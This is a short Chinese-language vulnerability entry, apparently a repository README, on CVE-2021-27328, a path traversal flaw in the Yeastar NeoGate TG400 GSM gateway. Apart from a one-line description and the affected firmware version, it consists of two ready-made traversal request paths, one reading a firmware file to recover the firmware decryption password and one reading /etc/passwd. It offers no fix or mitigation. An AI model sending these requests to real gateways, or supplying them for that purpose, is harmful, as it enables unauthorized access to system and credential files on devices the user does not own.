Yeastar-NeoGate

朗视 Yeastar NeoGate TG400 路径遍历漏洞CVE-2021-27328

描述

朗视 TG400 GSM 网关存在路径遍历，攻击者可以通过漏洞获取敏感信息

影响范围

朗视 TG400 GSM 网关91.3.0.3

获取固件解密密码

/cgi/WebCGI?1404=../../../../../../../../../../bin/firmware_detect

/etc/passwd：

/cgi/WebCGI?1404=../../../../../../../../../../etc/passwd

somatrasss/Yeastar-NeoGate